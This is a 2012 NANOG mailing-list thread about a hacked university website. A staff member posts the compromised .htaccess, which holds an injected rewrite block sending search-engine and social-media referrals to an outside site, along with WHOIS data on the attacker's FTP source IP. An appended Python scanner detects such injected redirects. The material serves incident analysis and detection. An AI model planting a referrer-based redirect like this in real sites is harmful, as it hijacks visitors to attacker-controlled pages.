No DNS poisoning at Google (in case of trouble, blame the DNS)

Kyle Creyts kyle.creyts at gmail.com
Tue Jul 3 18:33:23 UTC 2012


and upon further investigation, it seems like there might be an actual
organization using a host with that IP...

http://www.robtex.com/dns/chatwithus.net.html#shared

On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts <kyle.creyts at gmail.com> wrote:

> it actually appears that skywire has a suballocation for that block,
> http://www.robtex.com/ip/208.88.11.111.html#whois
>
> #
> # The following results may also be obtained via:
> # http://whois.arin.net/rest/nets;q=208.88.11.111?showDetails=true&showARIN=false&ext=netref2
> #
>
> American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255
>
> #
> # ARIN WHOIS data and services are subject to the Terms of Use
> # available at: https://www.arin.net/whois_tou.html
> #
>
> On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black at csulb.edu> wrote:
>
>> By the way, FTP access originated from: 208.88.11.111
>>
>> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
>> 208.88.11.255
>>
>> NetRange:       208.88.8.0 - 208.88.11.255
>> CIDR:           208.88.8.0/22
>> OriginAS:       AS40603
>> NetName:        SKYWIRE-SG
>> NetHandle:      NET-208-88-8-0-1
>> Parent:         NET-208-0-0-0-0
>> NetType:        Direct Allocation
>> Comment:        http://www.skywireusa.com
>> RegDate:        2008-03-04
>> Updated:        2012-03-02
>> Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1
>>
>> OrgName:        Sky Wire Communications
>> OrgId:          DGSU
>> Address:        946 W Sunset Blvd Ste L
>> City:           St George
>> StateProv:      UT
>> PostalCode:     84770
>> Country:        US
>> RegDate:        2007-12-04
>> Updated:        2009-11-04
>> Ref:            http://whois.arin.net/rest/org/DGSU
>>
>>
>> Who We Are
>> Skywire Communications is the Leading High Speed Internet Provider in
>> Southern Utah. Offering Service in St George, Washington, Santa Clara,
>> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
>> provide high speed internet access to 100 Percent of Southern Utah. We are
>> located in St George, Utah.
>>
>>
>>
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>> -----Original Message-----
>> From: Matthew Black [mailto:Matthew.Black at csulb.edu]
>> Sent: Wednesday, June 27, 2012 9:52 AM
>> To: 'Jason Hellenthal'; Arturo Servin
>> Cc: nanog at nanog.org
>> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>> Ask and ye shall receive:
>>
>> # more .htaccess (backup copy)
>>
>> #c3284d#
>> <IfModule mod_rewrite.c>
>> RewriteEngine On
>> RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
>> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
>> </IfModule>
>> #/c3284d#
>>
>>           # # #
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>> -----Original Message-----
>> From: Jason Hellenthal [mailto:jhellenthal at dataix.net]
>> Sent: Wednesday, June 27, 2012 6:26 AM
>> To: Arturo Servin
>> Cc: nanog at nanog.org
>> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>>
>> What would be nice is to see the contents of the htaccess file
>> (obviously with sensitive information excluded)
>>
>> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>> >
>> > It was not a DNS issue, but it was a clear case on how community-support
>> > helped.
>> >
>> > Some of us may even learn some new tricks. :)
>> >
>> > Regards,
>> > as
>> >
>> > Sent from mobile device. Excuse brevity and typos.
>> >
>> >
>> > On 27 Jun 2012, at 05:07, Daniel Rohan <drohan at gmail.com> wrote:
>> >
>> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer at nic.fr> wrote:
>> > >
>> > >> What made you think it can be a DNS cache poisoning (a very rare
>> > >> event, despite what the media say) when there are many much more
>> > >> realistic possibilities (<troll>specially for a Web site written in
>> > >> PHP</troll>)?
>> > >>
>> > >> What was the evidence pointing to a DNS problem?
>> > >>
>> > >
>> > > It seems likely that he made a mistake in his analysis of the evidence.
>> > > Something that could happen to anyone when operating outside of a comfort
>> > > zone or having a bad day. Go easy.
>> > >
>> > > -DR
>> >
>>
>> --
>>
>>  - (2^(N-1))
>>
>>
>>
>>
>>
>>
>>
>>
>
>
> --
> Kyle Creyts
>
> Information Assurance Professional
> BSidesDetroit Organizer
>



-- 
Kyle Creyts

Information Assurance Professional
BSidesDetroit Organizer
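
Added example, not part of the original thread or any poster's code: a small scanner for the pattern in the quoted .htaccess, a RewriteCond on HTTP_REFERER followed by a RewriteRule that redirects to a host the site does not own, optionally wrapped in paired "#xxxxxx#" comment markers. The function name, the own_hosts allow-list, and the sample file (example.org and example.net placeholders, a shortened referrer list, a made-up marker) are constructed for illustration.

```python
import re
from urllib.parse import urlparse

COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}(?:\s|$)', re.I)
RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)
# Paired "#xxxxxx#" / "#/xxxxxx#" comments, generalized from the one pair in the thread.
MARKER = re.compile(r'^\s*#(/?)([0-9a-f]{6})#\s*$', re.I)

def scan_htaccess(text, own_hosts):
    """Flag RewriteRules that send Referer-matched visitors to a host not in own_hosts."""
    findings, cond_line, open_tag = [], None, None
    for lineno, line in enumerate(text.splitlines(), 1):
        m = MARKER.match(line)
        if m:
            open_tag = None if m.group(1) else m.group(2)
            continue
        if COND.match(line):
            cond_line = lineno
            continue
        m = RULE.match(line)
        if not m:
            continue
        # Substitutions such as "-" or "/path" have no hostname and are ignored.
        host = (urlparse(m.group(1)).hostname or "").lower()
        if cond_line and host and host not in own_hosts:
            findings.append({"cond_line": cond_line, "rule_line": lineno,
                             "target_host": host, "flags": m.group(2) or "",
                             "marker": open_tag})
        cond_line = None  # conditions apply only to the next RewriteRule
    return findings

# Constructed sample: canonical-host redirect, hotlink block, then an injected block.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} !^https?://www\.example\.org/ [NC]
RewriteRule \.(png|jpg)$ - [F]
#0a1b2c#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(bing|google|yahoo)\.(.*)
RewriteRule ^(.*)$ http://redirect.example.net/landing.php [R=301,L]
</IfModule>
#/0a1b2c#
"""
OWN_HOSTS = {"example.org", "www.example.org"}

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, OWN_HOSTS):
        print(finding)
```

Only the injected block is reported; the canonical-host redirect and the hotlink rule are not, because neither combines a Referer condition with an off-site target.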


